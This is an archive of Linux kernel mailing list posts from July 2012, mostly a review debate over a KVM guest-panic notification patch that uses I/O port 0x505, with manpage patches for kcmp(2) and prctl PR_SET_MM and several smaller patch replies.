> 1) Virtio--this is our preferred PV interface.  It needs PCI to be fully
> initialized and probably will live as a module.
> 
> 2) Hypercalls--this a secondary PV interface but is available very
> early.  It's terminated in kvm.ko which means it can only operate on
> things that are logically part of the CPU and/or APIC complex.
> 
> This patch introduces a third interface which is available early like
> hypercalls but not necessarily terminated in kvm.ko.  That means it can
> have a broader scope in functionality than (2).
> 
> We could just as well use a hypercall and have multiple commands issued
> to that hypercall as a convention and add a new exit type to KVM that
> sent that specific hypercall to userspace for processing.
> 
> But a PIO operation already has this behavior and requires no changes to 
> kvm.ko.

I don't dispute that there may be a need for another guest-host interface, but 
this patch can basically be called "kvm: notify host when the guest is 
panicked, oh, btw, and add a brand new undocumented interface"

The new interface should at least come in its own patch, with documentation.


Re: [Qemu-devel] [PATCH v7] kvm: notify host when the guest is panicked

2012-07-22 Thread Sasha Levin
On 07/23/2012 12:29 AM, Anthony Liguori wrote:
> Sasha Levin  writes:
> 
>> On 07/22/2012 10:19 PM, Sasha Levin wrote:
>>> On 07/22/2012 09:22 PM, Anthony Liguori wrote:
>>>> Sasha Levin  writes:
>>>>
>>>>> On 07/21/2012 09:12 AM, Wen Congyang wrote:
>>>>>> +#define KVM_PV_PORT (0x505UL)
>>>>>> +
>>>>>>  #ifdef __KERNEL__
>>>>>>  #include 
>>>>>>  
>>>>>> @@ -221,6 +223,11 @@ static inline void kvm_disable_steal_time(void)
>>>>>>  }
>>>>>>  #endif
>>>>>>  
>>>>>> +static inline unsigned int kvm_arch_pv_features(void)
>>>>>> +{
>>>>>> +    return inl(KVM_PV_PORT);
>>>>>> +}
>>>>>> +
>>>>>
>>>>> Why is this safe?
>>>>>
>>>>> I'm not sure you can just pick any ioport you'd like and use it.
>>>>
>>>> There are three ways I/O ports get used on a PC:
>>>>
>>>> 1) Platform devices
>>>>  - This is well defined since the vast majority of platform devices are
>>>>    implemented within a single chip.  If you're emulating an i440fx
>>>>    chipset, the PIIX4 spec has an exhaustive list.
>>>>
>>>> 2) PCI devices
>>>>  - Typically, PCI only allocates ports starting at 0x0d00 to avoid
>>>>    conflicts with ISA devices.
>>>>
>>>> 3) ISA devices
>>>>  - ISA uses subtractive decoding so any ISA device can access.  In
>>>>    theory, an ISA device could attempt to use port 0x0505 but it's
>>>>    unlikely.  In a modern guest, there aren't really any ISA devices being
>>>>    added either.
>>>>
>>>> So yes, picking port 0x0505 is safe for something like this (as long as
>>>> you check to make sure that you really are under KVM).
>>>
>>> Is there anything that actually prevents me from using PCI ports lower than 
>>> 0x0d00? As you said in (3), ISA isn't really used anymore (nor is 
>>> implemented by lkvm for example), so placing PCI below 0x0d00 might even 
>>> make sense in that case.
>>>
>>> Furthermore, I can place one of these brand new virtio-mmio devices which 
>>> got introduced recently wherever I want right now - Having a device that 
>>> uses 0x505 would cause a pretty non-obvious failure mode.
>>>
>>> Either way, If we are going to grab an ioport, then:
>>>
>>>  - It should be documented well somewhere in Documentation/virt/kvm
>>>  - It should go through request_region() to actually claim those ioports.
>>>  - It should fail gracefully if that port is taken for some reason, instead 
>>> of not even checking it.
>>>
>>
>> Out of curiosity I tested that, and apparently lkvm has no problem 
>> allocating virtio-pci devices in that range:
>>
>> sh-4.2# pwd
>> /sys/devices/pci:00/:00:01.0
>> sh-4.2# cat resource | head -n1
>> 0x0500 0x05ff 0x00040101
>>
>> This was with the commit in question applied.
> 
> With all due respect, lkvm has a half-baked implementation of PCI.  This
> is why you have to pass kernel parameters to disable ACPI and disable
> PCI BIOS probing.
> 
> So yeah, you can do funky things in lkvm but that doesn't mean a system
> that emulated actual hardware would ever do that.

We disable ACPI simply because we don't support it. MPtable is a perfectly 
valid mechanism to do everything we need so far, so implementing ACPI didn't 
interest either of us too much. What's more - why implement a "complete design 
disaster in every way" ;)

Regarding PCI probing, while we do force the use of direct memory probing this 
is because we lack anything which resembles a BIOS. Like the above, this 
wasn't too interesting in a virtualized environment, and the kernel is pretty 
happy running without it. PCI probing does happen in a standard way.

I think that the interesting part in that test was not that you could actually 
put a PCI device in the 0x500 range, but that nothing failed and no one yelled 
at me (with the panic commit applied).

I'm not worried about port 0x505 being taken, I'm worried that it'll silently 
break a (although not very common/reasonable/typical) perfectly valid use case.


Re: [PATCH] fix ext4 mismerge back in January

2012-07-22 Thread Theodore Ts'o
On Wed, Jul 18, 2012 at 09:31:36AM +0100, Al Viro wrote:
> Duplicate caused, AFAICS, by mismerge in 
> ff9cb1c4eead5e4c292e75cd3170a82d66944101>
> Cc: sta...@vger.kernel.org
> Signed-off-by: Al Viro 

Applied, thanks.

- Ted


Re: [PATCH 00/34] Memory management performance backports for -stable

2012-07-22 Thread Ben Hutchings
I'm about to put 3.2.24 out for review, and it's pretty big already so
I'm going to defer these to 3.2.25.  I haven't forgotten or rejected
them.

Ben.

-- 
Ben Hutchings
73.46% of all statistics are made up.




Re: [PATCH 2/3] drivers/misc: Add realtek pci card reader driver

2012-07-22 Thread Rusty Russell
On Thu, 19 Jul 2012 17:55:10 +0800,  wrote:
> From: Wei WANG 
> 
> Realtek PCI-E card reader driver adapts requests from upper-level
> sdmmc/memstick layer to the real physical card reader.

> +static int msi_en = 1;
> +module_param(msi_en, int, S_IRUGO | S_IWUSR);
> +MODULE_PARM_DESC(msi_en, "Enable MSI");
> +
> +static int adma_mode = 1;
> +module_param(adma_mode, int, S_IRUGO | S_IWUSR);
> +MODULE_PARM_DESC(adma_mode, "ADMA Mode");

These seem like they should be bool?

Cheers,
Rusty.


Re: [PATCH 2/2] cpumask: cpumask_scnprintf() comments correction

2012-07-22 Thread Rusty Russell
On Mon, 16 Jul 2012 16:29:24 +0800, Alex Shi  wrote:
> On 07/16/2012 03:40 PM, Rusty Russell wrote:
> 
> > On Mon, 16 Jul 2012 10:35:54 +0800, Alex Shi  wrote:
> >> The function has no parameter @len now, so need to remove it from
> >> comments to avoid kernel-doc warning:
> > 
> > But it still does in my tree.
> > 
> > Please push this patch via whoever changed it?
> > 
> > Acked-by: Rusty Russell 
> > 
> 
> Sorry, my fault, the commit log used a wrong function name, it is 
> cpulist_parse()
> not cpumask_scnprntf. and find a new error in the comments: used a incorrect 
> function name: cpulist_parse_user(), the correct one is cpulist_parse().
> Fix it in updated patch.
> 
> Both errors appear in Rusty's commit 29c0177e6a4.

OK, I put this last line in the commit message, see below.

Thanks!
Rusty.

From: Alex Shi 
Date: Mon, 16 Jul 2012 10:25:06 +0800
Subject: [PATCH] cpumask: cpulist_parse() comments correction

As introduced in Rusty's commit 29c0177e6a4, the function has no
parameter @len, so need to remove it from comments to avoid kernel-doc
warning:

alexs@debian:~/linux-next$ scripts/kernel-doc -man
include/linux/cpumask.h | split-man.pl /tmp/man

Warning(include/linux/cpumask.h:602): Excess function parameter 'len'
description in 'cpulist_parse'

and correct the function name in comments to cpulist_parse.

Signed-off-by: Alex Shi 
Signed-off-by: Rusty Russell 
---
 include/linux/cpumask.h |3 +--
 1 files changed, 1 insertions(+), 2 deletions(-)

diff --git a/include/linux/cpumask.h b/include/linux/cpumask.h
index 8bf1c27..0325602 100644
--- a/include/linux/cpumask.h
+++ b/include/linux/cpumask.h
@@ -591,9 +591,8 @@ static inline int cpulist_scnprintf(char *buf, int len,
 }
 
 /**
- * cpulist_parse_user - extract a cpumask from a user string of ranges
+ * cpulist_parse - extract a cpumask from a user string of ranges
  * @buf: the buffer to extract from
- * @len: the length of the buffer
  * @dstp: the cpumask to set.
  *
  * Returns -errno, or 0 for success.
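
For readers unfamiliar with the "string of ranges" format the comment refers
to, the idea can be sketched in userspace as below. This is a simplified
stand-in and not the kernel's implementation: sketch_cpulist_parse() is a
hypothetical name, the mask is limited to 64 CPUs, and every malformed or
out-of-range input is reported as -EINVAL, which is an assumption made for
brevity.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/*
 * Parse a list such as "0-3,5" into a 64-bit mask.
 * Returns 0 on success or -EINVAL on malformed or out-of-range input;
 * *dstp is only written on success.
 */
int sketch_cpulist_parse(const char *buf, uint64_t *dstp)
{
	uint64_t mask = 0;
	const char *p = buf;

	for (;;) {
		char *end;
		unsigned long lo, hi, cpu;

		if (*p < '0' || *p > '9')
			return -EINVAL;		/* every item starts with a digit */
		lo = strtoul(p, &end, 10);
		hi = lo;
		p = end;

		if (*p == '-') {		/* optional "-hi" part of a range */
			p++;
			if (*p < '0' || *p > '9')
				return -EINVAL;
			hi = strtoul(p, &end, 10);
			p = end;
		}

		if (lo > hi || hi >= 64)
			return -EINVAL;
		for (cpu = lo; cpu <= hi; cpu++)
			mask |= UINT64_C(1) << cpu;

		if (*p == '\0')
			break;
		if (*p != ',')
			return -EINVAL;
		p++;				/* skip the separator */
	}

	*dstp = mask;
	return 0;
}
```

With this sketch, "0-3,5" yields the mask 0x2f, while "3-1" or a trailing
comma is rejected.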


Re: [Qemu-devel] [PATCH v7.5] kvm: notify host when the guest is panicked

2012-07-22 Thread Anthony Liguori
Sasha Levin  writes:

> On 07/22/2012 09:14 PM, Anthony Liguori wrote:
>> Sasha Levin  writes:
>> 
>>> On 07/21/2012 10:44 AM, Wen Congyang wrote:
>>>> We can know the guest is panicked when the guest runs on xen.
>>>> But we do not have such feature on kvm.
>>>>
>>>> Another purpose of this feature is: management app(for example:
>>>> libvirt) can do auto dump when the guest is panicked. If management
>>>> app does not do auto dump, the guest's user can do dump by hand if
>>>> he sees the guest is panicked.
>>>>
>>>> We have three solutions to implement this feature:
>>>> 1. use vmcall
>>>> 2. use I/O port
>>>> 3. use virtio-serial.
>>>>
>>>> We have decided to avoid touching hypervisor. The reason why I choose
>>>> choose the I/O port is:
>>>> 1. it is easier to implememt
>>>> 2. it does not depend any virtual device
>>>> 3. it can work when starting the kernel
>>>
>>> Was the option of implementing a virtio-watchdog driver considered?
>>>
>>> You're basically re-implementing a watchdog, a guest-host interface and a 
>>> set of protocols for guest-host communications.
>>>
>>> Why can't we re-use everything we have now, push a virtio watchdog
>>> driver into drivers/watchdog/, and gain a more complete solution to
>>> detecting hangs inside the guest.
>> 
>> The purpose of virtio is not to reinvent every possible type of device.
>> There are plenty of hardware watchdogs that are very suitable to be used
>> for this purpose.  QEMU implements quite a few already.
>> 
>> Watchdogs are not performance sensitive so there's no point in using
>> virtio.
>
> The issue here is not performance, but the adding of a brand new
> guest-host interface.

We have:

1) Virtio--this is our preferred PV interface.  It needs PCI to be fully
initialized and probably will live as a module.

2) Hypercalls--this is a secondary PV interface but is available very
early.  It's terminated in kvm.ko which means it can only operate on
things that are logically part of the CPU and/or APIC complex.

This patch introduces a third interface which is available early like
hypercalls but not necessarily terminated in kvm.ko.  That means it can
have a broader scope in functionality than (2).

We could just as well use a hypercall and have multiple commands issued
to that hypercall as a convention and add a new exit type to KVM that
sent that specific hypercall to userspace for processing.

But a PIO operation already has this behavior and requires no changes to kvm.ko.

> virtio-rng isn't performance sensitive either, yet it was implemented
> using virtio so there wouldn't be yet another interface to communicate
> between guest and host.

There isn't really an obvious discrete RNG that is widely supported.

> This patch goes ahead to add a "arch pv features" interface using
> ioports, without any idea what it might be used for beyond this
> watchdog.

It's not a watchdog--it's the opposite of a watchdog.

You know such a thing already exists in the kernel, right?  S390 has had
a hypercall like this for years.

Regards,

Anthony Liguori


Re: [Qemu-devel] [PATCH v7] kvm: notify host when the guest is panicked

2012-07-22 Thread Anthony Liguori
Sasha Levin  writes:

> On 07/22/2012 10:19 PM, Sasha Levin wrote:
>> On 07/22/2012 09:22 PM, Anthony Liguori wrote:
>>> Sasha Levin  writes:
>>>
>>>> On 07/21/2012 09:12 AM, Wen Congyang wrote:
>>>>> +#define KVM_PV_PORT  (0x505UL)
>>>>> +
>>>>>  #ifdef __KERNEL__
>>>>>  #include 
>>>>>  
>>>>> @@ -221,6 +223,11 @@ static inline void kvm_disable_steal_time(void)
>>>>>  }
>>>>>  #endif
>>>>>  
>>>>> +static inline unsigned int kvm_arch_pv_features(void)
>>>>> +{
>>>>> + return inl(KVM_PV_PORT);
>>>>> +}
>>>>> +
>>>>
>>>> Why is this safe?
>>>>
>>>> I'm not sure you can just pick any ioport you'd like and use it.
>>>
>>> There are three ways I/O ports get used on a PC:
>>>
>>> 1) Platform devices
>>>  - This is well defined since the vast majority of platform devices are
>>>implemented within a single chip.  If you're emulating an i440fx
>>>chipset, the PIIX4 spec has an exhaustive list.
>>>
>>> 2) PCI devices
>>>  - Typically, PCI only allocates ports starting at 0x0d00 to avoid
>>>conflicts with ISA devices.
>>>
>>> 3) ISA devices
>>>  - ISA uses subtractive decoding so any ISA device can access.  In
>>>theory, an ISA device could attempt to use port 0x0505 but it's
>>>unlikely.  In a modern guest, there aren't really any ISA devices being
>>>added either.
>>>
>>> So yes, picking port 0x0505 is safe for something like this (as long as
>>> you check to make sure that you really are under KVM).
>> 
>> Is there anything that actually prevents me from using PCI ports lower than 
>> 0x0d00? As you said in (3), ISA isn't really used anymore (nor is 
>> implemented by lkvm for example), so placing PCI below 0x0d00 might even 
>> make sense in that case.
>> 
>> Furthermore, I can place one of these brand new virtio-mmio devices which 
>> got introduced recently wherever I want right now - Having a device that 
>> uses 0x505 would cause a pretty non-obvious failure mode.
>> 
>> Either way, If we are going to grab an ioport, then:
>> 
>>  - It should be documented well somewhere in Documentation/virt/kvm
>>  - It should go through request_region() to actually claim those ioports.
>>  - It should fail gracefully if that port is taken for some reason, instead 
>> of not even checking it.
>> 
>
> Out of curiosity I tested that, and apparently lkvm has no problem allocating 
> virtio-pci devices in that range:
>
> sh-4.2# pwd
> /sys/devices/pci:00/:00:01.0
> sh-4.2# cat resource | head -n1
> 0x0500 0x05ff 0x00040101
>
> This was with the commit in question applied.

With all due respect, lkvm has a half-baked implementation of PCI.  This
is why you have to pass kernel parameters to disable ACPI and disable
PCI BIOS probing.

So yeah, you can do funky things in lkvm but that doesn't mean a system
that emulated actual hardware would ever do that.

Regards,

Anthony Liguori


Re: [Qemu-devel] [PATCH v7] kvm: notify host when the guest is panicked

2012-07-22 Thread Anthony Liguori
Sasha Levin  writes:

> On 07/22/2012 09:22 PM, Anthony Liguori wrote:
>> Sasha Levin  writes:
>> 
>>> On 07/21/2012 09:12 AM, Wen Congyang wrote:
>>>> +#define KVM_PV_PORT   (0x505UL)
>>>> +
>>>>  #ifdef __KERNEL__
>>>>  #include 
>>>>  
>>>> @@ -221,6 +223,11 @@ static inline void kvm_disable_steal_time(void)
>>>>  }
>>>>  #endif
>>>>  
>>>> +static inline unsigned int kvm_arch_pv_features(void)
>>>> +{
>>>> +  return inl(KVM_PV_PORT);
>>>> +}
>>>> +
>>>
>>> Why is this safe?
>>>
>>> I'm not sure you can just pick any ioport you'd like and use it.
>> 
>> There are three ways I/O ports get used on a PC:
>> 
>> 1) Platform devices
>>  - This is well defined since the vast majority of platform devices are
>>implemented within a single chip.  If you're emulating an i440fx
>>chipset, the PIIX4 spec has an exhaustive list.
>> 
>> 2) PCI devices
>>  - Typically, PCI only allocates ports starting at 0x0d00 to avoid
>>conflicts with ISA devices.
>> 
>> 3) ISA devices
>>  - ISA uses subtractive decoding so any ISA device can access.  In
>>theory, an ISA device could attempt to use port 0x0505 but it's
>>unlikely.  In a modern guest, there aren't really any ISA devices being
>>added either.
>> 
>> So yes, picking port 0x0505 is safe for something like this (as long as
>> you check to make sure that you really are under KVM).
>
> Is there anything that actually prevents me from using PCI ports lower
> than 0x0d00? As you said in (3), ISA isn't really used anymore (nor is
> implemented by lkvm for example), so placing PCI below 0x0d00 might
> even make sense in that case.

On modern systems, the OS goes by whatever is in the ACPI table
describing the PCI bus.  In QEMU, we have:

WordIO (ResourceProducer, MinFixed, MaxFixed, PosDecode, EntireRange,
  0x0000, // Address Space Granularity
  0x0D00, // Address Range Minimum
  0xFFFF, // Address Range Maximum
  0x0000, // Address Translation Offset
  0xF300, // Address Length
  ,, , TypeStatic)

So Linux will always use 0x0D00 -> 0xFFFF for the valid
range. Practically speaking, you can't use anything below 0x0D00 because
the PCI bus configuration registers live at 0xCF8-0xCFF.  If you tried
to create the region starting at 0x0500 you'd have to limit it to 0xCF8
to avoid conflicting with the PCI host controller.

That's not a useful amount of space for I/O ports so that would be a
pretty dumb thing to do.
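
The arithmetic behind that can be checked with a small userspace sketch.
struct io_window and the two helpers are hypothetical names used only for
illustration; the numbers are the minimum (0x0D00) and length (0xF300) from
the descriptor above and the 0xCF8 configuration-register base.

```c
#include <stdbool.h>
#include <stdint.h>

/* An I/O port window described by its first port and its length. */
struct io_window {
	uint32_t min;
	uint32_t len;
};

/* Last port that still belongs to the window (inclusive). */
uint32_t io_window_max(struct io_window w)
{
	return w.min + w.len - 1;
}

/* True if the given port falls inside the window. */
bool io_window_contains(struct io_window w, uint32_t port)
{
	return port >= w.min && port <= io_window_max(w);
}
```

With min = 0x0D00 and len = 0xF300 the last port is 0xFFFF, so 0x505 lies
outside the window. A hypothetical window starting at 0x0500 and stopping
short of 0xCF8 would cover only 0xCF8 - 0x500 = 0x7F8 (2040) ports.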

> Furthermore, I can place one of these brand new virtio-mmio devices
> which got introduced recently wherever I want right now - Having a
> device that uses 0x505 would cause a pretty non-obvious failure mode.

I think you're confusing PIO with MMIO.  They are separate address
spaces.

You could certainly argue that relying on PIO is way too architecture
specific since that's only available on x86.  That's a good argument but
the counter is that other architectures have their own interfaces for
this sort of thing.

> Either way, If we are going to grab an ioport, then:
>
>  - It should be documented well somewhere in Documentation/virt/kvm
>  - It should go through request_region() to actually claim those ioports.
>  - It should fail gracefully if that port is taken for some reason,
>  instead of not even checking it.

I agree with the above.
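
To make the "claim the range and fail gracefully" point concrete, here is a
userspace model of the idea. It is only a sketch: sketch_request_region() and
its table are hypothetical, and unlike this model the kernel's
request_region() returns a struct resource pointer (NULL on failure) rather
than an errno value.

```c
#include <errno.h>
#include <stddef.h>

#define SKETCH_MAX_REGIONS 16

/* One claimed port range; start and end are both inclusive. */
struct sketch_region {
	unsigned long start;
	unsigned long end;
	const char *name;
};

static struct sketch_region sketch_regions[SKETCH_MAX_REGIONS];
static size_t sketch_nregions;

/*
 * Claim n ports starting at start. Returns 0 on success, -EBUSY if the
 * range overlaps an existing claim, -EINVAL for an empty range and
 * -ENOMEM if the table is full.
 */
int sketch_request_region(unsigned long start, unsigned long n, const char *name)
{
	unsigned long end;
	size_t i;

	if (n == 0)
		return -EINVAL;
	end = start + n - 1;

	for (i = 0; i < sketch_nregions; i++) {
		/* two inclusive ranges overlap if each starts before the other ends */
		if (start <= sketch_regions[i].end && sketch_regions[i].start <= end)
			return -EBUSY;
	}

	if (sketch_nregions == SKETCH_MAX_REGIONS)
		return -ENOMEM;

	sketch_regions[sketch_nregions].start = start;
	sketch_regions[sketch_nregions].end = end;
	sketch_regions[sketch_nregions].name = name;
	sketch_nregions++;
	return 0;
}
```

In this model, once a device has claimed 0x500-0x5ff, a later claim for the
four ports at 0x505 gets -EBUSY and the caller can disable the feature
instead of silently sharing the port.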

Regards,

Anthony Liguori


[PATCH 1/2] Add kcmp.2 manpage

2012-07-22 Thread Cyrill Gorcunov
NAME
   kcmp - compare if two processes do share a particular kernel resource

SYNOPSIS
   #define _GNU_SOURCE /* See feature_test_macros(7) */
   #include 
   #include 
   #include/* For SYS_xxx definitions */

   int syscall(__NR_kcmp, pid1, pid2, type, idx1, idx2);

DESCRIPTION
   kcmp() determines whether two processes, identified by pid1 and pid2,
   share a kernel resource such as virtual memory, file descriptors, or
   file system information.

   The comparison type is one of the following:

   KCMP_FILE determines whether file descriptor idx1 in the first process
   is the same as file descriptor idx2 in the second process

   KCMP_VM compares whether the processes share an address space

   KCMP_FILES compares the file descriptor arrays to see whether the
   processes share all files

   KCMP_FS compares whether the processes share file system information
   (the current umask, working directory, namespace root, etc.)

   KCMP_SIGHAND compares whether the processes share a signal handler table

   KCMP_IO compares whether the processes share an I/O context, used mainly
   for block I/O scheduling

   KCMP_SYSVSEM compares the list of undo operations associated with SYSV
   semaphores

   Note that kcmp() is not protected against false positives, which may
   occur if the tasks are running.  One should therefore stop the tasks
   being inspected with this syscall to obtain meaningful results.

RETURN VALUE
   kcmp() was designed to return values suitable for sorting.  This is
   particularly handy when one has to compare a large number of file
   descriptors.

   The return value is merely the result of a simple arithmetic comparison
   of kernel pointers (when the kernel compares resources, it uses their
   memory addresses).

   The easiest way to explain is to consider an example.  Let's say v1 and
   v2 are the addresses of the appropriate resources; then the return value
   is one of the following:

   0 - v1 is equal to v2; in other words, the resource is shared
   1 - v1 is less than v2
   2 - v1 is greater than v2
   3 - v1 is not equal to v2, but ordering information is unavailable

   On error, -1 is returned, and errno is set appropriately.
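
   The ordering convention can be modelled in userspace as follows.  This
   is only a sketch of the 0/1/2 encoding described above, not a call into
   the syscall: sketch_kcmp_result() and sketch_kcmp_qsort_cmp() are
   hypothetical names, plain integers stand in for kernel addresses, and
   the "unordered" value 3 is deliberately not modelled.

```c
#include <stdint.h>
#include <stdlib.h>

/* Encode the comparison of two addresses the way the text describes. */
int sketch_kcmp_result(uintptr_t v1, uintptr_t v2)
{
	if (v1 == v2)
		return 0;		/* same resource */
	return v1 < v2 ? 1 : 2;		/* 1: less than, 2: greater than */
}

/* Adapter that turns the 0/1/2 encoding into a qsort() comparator. */
int sketch_kcmp_qsort_cmp(const void *a, const void *b)
{
	uintptr_t v1 = *(const uintptr_t *)a;
	uintptr_t v2 = *(const uintptr_t *)b;

	switch (sketch_kcmp_result(v1, v2)) {
	case 0:
		return 0;
	case 1:
		return -1;
	default:
		return 1;
	}
}
```

   Sorting with such a comparator puts equal entries next to each other,
   so shared resources among many descriptors can be found without
   comparing every pair.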

Signed-off-by: Cyrill Gorcunov 
CC: "Eric W. Biederman" 
CC: "H. Peter Anvin" 
CC: Pavel Emelyanov 
CC: Al Viro 
Signed-off-by: Cyrill Gorcunov 
---
 man2/kcmp.2 |  113 +++
 1 files changed, 113 insertions(+), 0 deletions(-)
 create mode 100644 man2/kcmp.2

diff --git a/man2/kcmp.2 b/man2/kcmp.2
new file mode 100644
index 000..5d2e9a3
--- /dev/null
+++ b/man2/kcmp.2
@@ -0,0 +1,113 @@
+.TH KCMP 2 2012-02-01 "Linux" "Linux Programmer's Manual"
+
+.SH NAME
+kcmp \- compare if two processes do share a particular kernel resource
+
+.SH SYNOPSIS
+.nf
+.BR "#define _GNU_SOURCE" " /* See feature_test_macros(7) */"
+.B #include 
+.B #include 
+.BR "#include"  "/* For SYS_xxx definitions */"
+
+.BI "int syscall(__NR_kcmp, pid1, pid2, type, idx1, idx2);"
+.fi
+
+.SH DESCRIPTION
+
+.BR kcmp ()
+makes it possible to find out whether two processes identified by
+.I pid1
+and
+.I pid2
+share kernel resources such as virtual memory, file descriptors, file system etc.
+
+The comparison
+.I type
+is one of the following
+
+.BR KCMP_FILE
+determines whether a file descriptor
+.I idx1
+in the first process is the same as another descriptor
+.I idx2
+in the second process
+
+.BR KCMP_VM
+compares whether processes share address space
+
+.BR KCMP_FILES
+compares the file descriptor arrays to see whether the processes share all files
+
+.BR KCMP_FS
+compares whether processes share the file system information (the current umask,
+working directory, namespace root, etc)
+
+.BR KCMP_SIGHAND
+compares whether processes share a signal handlers table
+
+.BR KCMP_IO
+compares whether processes do share I/O context,
+used mainly for block I/O scheduling
+
+.BR KCMP_SYSVSEM
+compares the list of undo operations associated with SYSV semaphores
+
+Note that
+.BR kcmp ()
+is not protected against false positives, which may occur if the tasks are
+running.
+One should therefore stop the tasks being inspected with this syscall to obtain
+meaningful results.
+
+.SH "RETURN VALUE"
+.B kcmp
+was designed to return values suitable for sorting.
+This is particularly handy when one has to compare
+a large number of file descriptors.
+
+The return value is merely a result of simple arithmetic comparison
+of kernel pointers (when kernel compares resources, it uses their
+memory addresses).
+
+The easiest way to explain is to consider an example.
+Let's say
+.I v1
+and
+.I v2
+are the addresses of appropriate resources, then the return value
+is one of the following
+
+.B 0
+\-
+.I v1
+is equal to
+.IR v2 ,
+in other words we have a shared resource here
+
+.B 1
+\-
+.I v1
+is less than
+.I v2
+
+.B 2
+\-
+.I v1
+is greater than
+.I

[PATCH 2/2] prctl.2: Add PR_SET_MM option description

2012-07-22 Thread Cyrill Gorcunov
CC: Pavel Emelyanov 
Signed-off-by: Cyrill Gorcunov 
---
 man2/prctl.2 |  161 +-
 1 files changed, 160 insertions(+), 1 deletions(-)

diff --git a/man2/prctl.2 b/man2/prctl.2
index effad2a..2e1b27c 100644
--- a/man2/prctl.2
+++ b/man2/prctl.2
@@ -378,6 +378,121 @@ Return the current per-process machine check kill policy.
 All unused
 .BR prctl ()
 arguments must be zero.
+.TP
+.BR PR_SET_MM " (since Linux 3.3)"
+Allows a user to modify certain kernel memory map descriptor fields
+of the calling process.
+Usually these fields are set by the kernel and dynamic loader (see
+.BR ld.so (8)
+for more information) and a regular application should not use this feature.
+Still there are cases such as self-modifying programs, where a program might
+find it useful to change its own memory map.
+The kernel must be built with
+.BR CONFIG_CHECKPOINT_RESTORE
+option turned on, otherwise this feature will not be accessible
+from a user space level.
+The calling process must have
+.BR CAP_SYS_RESOURCE
+(see
+.BR capabilities (7)
+for details) capability granted.
+The value in
+.I arg2
+is one of the options below, while
+.I arg3
+provides a new value for this option.
+
+.BR PR_SET_MM_START_CODE
+to set the address above which program text can run.
+
+.BR PR_SET_MM_END_CODE
+to set the address below which program text can run.
+
+.BR PR_SET_MM_START_DATA
+to set the address above which program data+bss is placed.
+
+.B PR_SET_MM_END_DATA
+to set the address below which program data+bss is placed.
+
+.BR PR_SET_MM_START_STACK
+to set the start address of the stack.
+
+.BR PR_SET_MM_START_BRK
+to set the address above which program heap can be expanded with
+.BR brk (2)
+call.
+The address must be greater than the ending address of
+the current program data segment, and the resulting heap must not exceed
+the resource limit for data (see
+.BR setrlimit (2)
+for more information).
+
+.BR PR_SET_MM_BRK
+to set the current
+.BR brk (2)
+value.
+The requirements for address are the same as for
+.BR PR_SET_MM_START_BRK
+option.
+
+.BR PR_SET_MM_ARG_START
+to set the address above which program command line is placed.
+
+.BR PR_SET_MM_ARG_END
+to set the address below which program command line is placed.
+
+.BR PR_SET_MM_ENV_START
+to set the address above which program environment is placed.
+
+.BR PR_SET_MM_ENV_END
+to set the address below which program environment is placed.
+
+The address passed with
+.BR PR_SET_MM_ARG_START ,
+.BR PR_SET_MM_ARG_END ,
+.BR PR_SET_MM_ENV_START ,
+.BR PR_SET_MM_ENV_END ,
+should belong to a process stack area, thus the corresponding memory area
+must be readable, writable and (depending on the kernel
+configuration) have the
+.BR MAP_GROWSDOWN
+attribute set (see
+.BR mmap (2)
+for details).
+
+.BR PR_SET_MM_AUXV
+to set a new auxiliary vector.
+The
+.I arg3
+argument should provide the address of the vector.
+The
+.I arg4
+is the size of the vector.
+
+.BR PR_SET_MM_EXE_FILE
+to supersede
+.IR /proc/pid/exe
+symbolic link with a new one pointing to a new executable file
+whose descriptor is provided in the
+.I arg3
+argument.
+The file descriptor should be obtained with a regular
+.BR open (2)
+call.
+
+To change the symlink, one needs to unmap all existing
+executable memory areas created by the kernel itself
+(for example the kernel usually creates at least one executable
+memory area for the ELF file
+.IR \.text
+section).
+
+The second limitation is that such a transition can be done only once
+in a process's lifetime.
+Any further attempts will be rejected.
+This should help system administrators monitor unusual
+symlink transitions across all processes running on a system.
+.\"
 .SH "RETURN VALUE"
 On success,
 .BR PR_GET_DUMPABLE ,
@@ -411,7 +526,9 @@ is not recognized.
 is
 .BR PR_MCE_KILL
 or
-.BR PR_MCE_KILL_GET ,
+.BR PR_MCE_KILL_GET
+or
+.BR PR_SET_MM ,
 and unused
 .BR prctl ()
 arguments were not specified as zero.
@@ -459,6 +576,48 @@ is
 and the caller does not have the
 .B CAP_SETPCAP
 capability.
+.TP
+.B EPERM
+.I option
+is
+.BR PR_SET_MM ,
+and the caller does not have the
+.B CAP_SYS_RESOURCE
+capability.
+.TP
+.B EACCES
+.I option
+is
+.BR PR_SET_MM ,
+and
+.I arg2
+is
+.BR PR_SET_MM_EXE_FILE ,
+and the file is not executable.
+.TP
+.B EBUSY
+.I option
+is
+.BR PR_SET_MM ,
+and
+.I arg2
+is
+.BR PR_SET_MM_EXE_FILE ,
+and this is a second attempt to change the
+.I /proc/pid/exe
+symlink, which is prohibited.
+.TP
+.B EBADF
+.I option
+is
+.BR PR_SET_MM ,
+and
+.I arg2
+is
+.BR PR_SET_MM_EXE_FILE ,
+and the file descriptor passed in
+.I arg3
+is not valid.
 .\" The following can't actually happen, because prctl() in
 .\" seccomp mode will cause SIGKILL.
 .\" .TP
-- 
1.7.7.6
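
For readers who want to see the calling convention described in the patch
above (sub-option in arg2, new value in arg3, unused arguments zero), here
is a small sketch.  set_mm_field() and reset_brk_to_current() are made-up
helper names.  The call is expected to fail unless the process has
CAP_SYS_RESOURCE and the kernel provides the feature, so the helper only
reports the error and returns -1 in that case.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>

/*
 * Hypothetical wrapper: passes one PR_SET_MM_* sub-option in arg2 and the
 * new value in arg3; the remaining prctl() arguments are left as zero.
 * Returns 0 on success, -1 on failure (errno is left as set by prctl()).
 */
int set_mm_field(int field, unsigned long value)
{
    assert(field > 0);  /* the PR_SET_MM_* sub-options start at 1 */

    if (prctl(PR_SET_MM, (unsigned long)field, value, 0UL, 0UL) == -1) {
        int saved = errno;

        fprintf(stderr, "PR_SET_MM field %d: %s\n", field, strerror(saved));
        errno = saved;
        return -1;
    }
    return 0;
}

/*
 * Asks the kernel to set the program break to the value it already has,
 * which should leave the memory map unchanged even when the call succeeds.
 */
int reset_brk_to_current(void)
{
    return set_mm_field(PR_SET_MM_BRK, (unsigned long)sbrk(0));
}
```

Without the capability the expected outcome is -1 with errno set to EPERM;
other errors are possible depending on the kernel configuration.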

--
